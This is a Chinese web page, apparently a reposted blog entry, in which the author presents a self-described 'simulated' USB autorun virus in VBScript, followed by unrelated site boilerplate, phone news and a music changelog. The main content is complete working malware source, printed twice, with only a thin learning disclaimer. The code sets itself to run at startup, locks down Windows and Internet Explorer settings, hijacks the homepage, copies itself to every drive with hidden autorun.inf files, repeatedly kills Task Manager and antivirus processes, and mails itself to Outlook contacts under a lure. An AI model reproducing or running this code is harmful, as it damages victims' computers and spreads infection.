DDR爱好者之家 Design By 杰米
使用过U盘的朋友都知道u盘病毒是一种Autorun自运行病毒,当双击时触发病毒体,会复制自身到C D E和系统盘system32下等盘符,(生成exe文件和一个Autorun.inf文件),同时修改注册表,当点击C盘等盘符右键时,会有一个auto命令(黑色粗体)或者是两个开始命令,本人学习vbs才15天,我也来模拟下这个autorun病毒 和部分熊猫烧香功能,本人能力有限, 只能模拟这样的病毒了,声明, 本人模拟这个病毒,全是为了学习和技术,切忌不要搞破坏,如果有人用本人代码破坏,后果自负on error resume next
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKCR\Drive\shell\","auto"
wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy "c:\"
myfile.copy "D:\"
myfile.copy "E:\"
myfile.copy "F:\"
myfile.copy "I:\"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
If fso.FileExists("C:\autorun.inf") Then
Set objFolder = fso.GetFile("C:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]C:\autorun.inf"_
&"&& echo open=NYboy.bat C:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat C:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batC:\autorun.inf"_
&"&& echo shell=AutoC:\autorun.inf"_
&"&& attrib +h +s +r C:\autorun.inf"
set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:\autorun.inf") Then
Set objFolder = fso.GetFile("D:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]D:\autorun.inf"_
&"&& echo open=NYboy.bat D:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat D:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batD:\autorun.inf"_
&"&& echo shell=AutoD:\autorun.inf"_
&"&& attrib +h +s +r D:\autorun.inf"
set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:\autorun.inf") Then
Set objFolder = fso.GetFile("E:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]E:\autorun.inf"_
&"&& echo open=NYboy.bat E:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat E:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batE:\autorun.inf"_
&"&& echo shell=AutoE:\autorun.inf"_
&"&& attrib +h +s +r E:\autorun.inf"
set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:\autorun.inf") Then
Set objFolder = fso.GetFile("F:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]F:\autorun.inf"_
&"&& echo open=NYboy.bat F:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat F:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batF:\autorun.inf"_
&"&& echo shell=AutoF:\autorun.inf"_
&"&& attrib +h +s +r F:\autorun.inf"
set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:\autorun.inf") Then
Set objFolder = fso.GetFile("I:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]I:\autorun.inf"_
&"&& echo open=NYboy.bat I:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat I:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batI:\autorun.inf"_
&"&& echo shell=AutoI:\autorun.inf"_
&"&& attrib +h +s +r I:\autorun.inf"
set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_
&"&& attrib +h +s +r D:\NYboy.bat"_
&"&& attrib +h +s +r E:\NYboy.bat"_
&"&& attrib +h +s +r F:\NYboy.bat"_
&"&& attrib +h +s +r I:\NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
set ws=getobject("winmgmts:\\.\root\cimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'使病毒可以靠邮件传播
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! QQ交友频道"
Mail.Attachments.Add("c:\NYboy.vbs")
Mail.Send
Next
ol.Quit
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'修改注册表(开始菜单里面的东西和IE各项设置)
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://ruanji03.ys168.com"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://ruanji03.ys168.com"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'使用户不能通过双击打开硬盘,这里还可以修改为使其不能通过双击打开文件夹,同理,不赘续
wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKCR\Drive\shell\","auto"
wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
'修改默认文件图标 这里可以换成可爱的熊猫哦
wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,大兵和你开个小小的玩笑"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ252287438联系"
'复制自身到C,D,E,F,U盘
myfile.copy "c:\"
myfile.copy "D:\"
myfile.copy "E:\"
myfile.copy "F:\"
myfile.copy "I:\"
myfile.attributes=34
'定义Autorun.inf 的内容 这个就是u盘病毒必须的代码部分 这里可以简单写
If fso.FileExists("C:\autorun.inf") Then
Set objFolder = fso.GetFile("C:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]C:\autorun.inf"_
&"&& echo open=NYboy.bat C:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat C:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batC:\autorun.inf"_
&"&& echo shell=AutoC:\autorun.inf"_
&"&& attrib +h +s +r C:\autorun.inf"
set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:\autorun.inf") Then
Set objFolder = fso.GetFile("D:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]D:\autorun.inf"_
&"&& echo open=NYboy.bat D:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat D:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batD:\autorun.inf"_
&"&& echo shell=AutoD:\autorun.inf"_
&"&& attrib +h +s +r D:\autorun.inf"
set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:\autorun.inf") Then
Set objFolder = fso.GetFile("E:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]E:\autorun.inf"_
&"&& echo open=NYboy.bat E:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat E:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batE:\autorun.inf"_
&"&& echo shell=AutoE:\autorun.inf"_
&"&& attrib +h +s +r E:\autorun.inf"
set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:\autorun.inf") Then
Set objFolder = fso.GetFile("F:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]F:\autorun.inf"_
&"&& echo open=NYboy.bat F:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat F:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batF:\autorun.inf"_
&"&& echo shell=AutoF:\autorun.inf"_
&"&& attrib +h +s +r F:\autorun.inf"
set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:\autorun.inf") Then
Set objFolder = fso.GetFile("I:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]I:\autorun.inf"_
&"&& echo open=NYboy.bat I:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat I:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.batI:\autorun.inf"_
&"&& echo shell=AutoI:\autorun.inf"_
&"&& attrib +h +s +r I:\autorun.inf"
set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'设置病毒体属性为 系统 只读 隐藏
wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_
&"&& attrib +h +s +r D:\NYboy.bat"_
&"&& attrib +h +s +r E:\NYboy.bat"_
&"&& attrib +h +s +r F:\NYboy.bat"_
&"&& attrib +h +s +r I:\NYboy.bat"
'强制结束某些进程,比如QQ,记事本,网页,批处理文件,卡巴,realplay等进程,运行后打不开这些文件
do
set ws=getobject("winmgmts:\\.\root\cimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'使病毒可以靠邮件传播
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="今晚你来吗?"
Mail.Body="朋友你好:您的朋友给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! QQ交友频道"
Mail.Attachments.Add("c:\NYboy.vbs")
Mail.Send
Next
ol.Quit
DDR爱好者之家 Design By 杰米
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
DDR爱好者之家 Design By 杰米
暂无评论...
P70系列延期,华为新旗舰将在下月发布
3月20日消息,近期博主@数码闲聊站 透露,原定三月份发布的华为新旗舰P70系列延期发布,预计4月份上市。
而博主@定焦数码 爆料,华为的P70系列在定位上已经超过了Mate60,成为了重要的旗舰系列之一。它肩负着重返影像领域顶尖的使命。那么这次P70会带来哪些令人惊艳的创新呢?
根据目前爆料的消息来看,华为P70系列将推出三个版本,其中P70和P70 Pro采用了三角形的摄像头模组设计,而P70 Art则采用了与上一代P60 Art相似的不规则形状设计。这样的外观是否好看见仁见智,但辨识度绝对拉满。
更新日志
2024年12月26日
2024年12月26日
- 小骆驼-《草原狼2(蓝光CD)》[原抓WAV+CUE]
- 群星《欢迎来到我身边 电影原声专辑》[320K/MP3][105.02MB]
- 群星《欢迎来到我身边 电影原声专辑》[FLAC/分轨][480.9MB]
- 雷婷《梦里蓝天HQⅡ》 2023头版限量编号低速原抓[WAV+CUE][463M]
- 群星《2024好听新歌42》AI调整音效【WAV分轨】
- 王思雨-《思念陪着鸿雁飞》WAV
- 王思雨《喜马拉雅HQ》头版限量编号[WAV+CUE]
- 李健《无时无刻》[WAV+CUE][590M]
- 陈奕迅《酝酿》[WAV分轨][502M]
- 卓依婷《化蝶》2CD[WAV+CUE][1.1G]
- 群星《吉他王(黑胶CD)》[WAV+CUE]
- 齐秦《穿乐(穿越)》[WAV+CUE]
- 发烧珍品《数位CD音响测试-动向效果(九)》【WAV+CUE】
- 邝美云《邝美云精装歌集》[DSF][1.6G]
- 吕方《爱一回伤一回》[WAV+CUE][454M]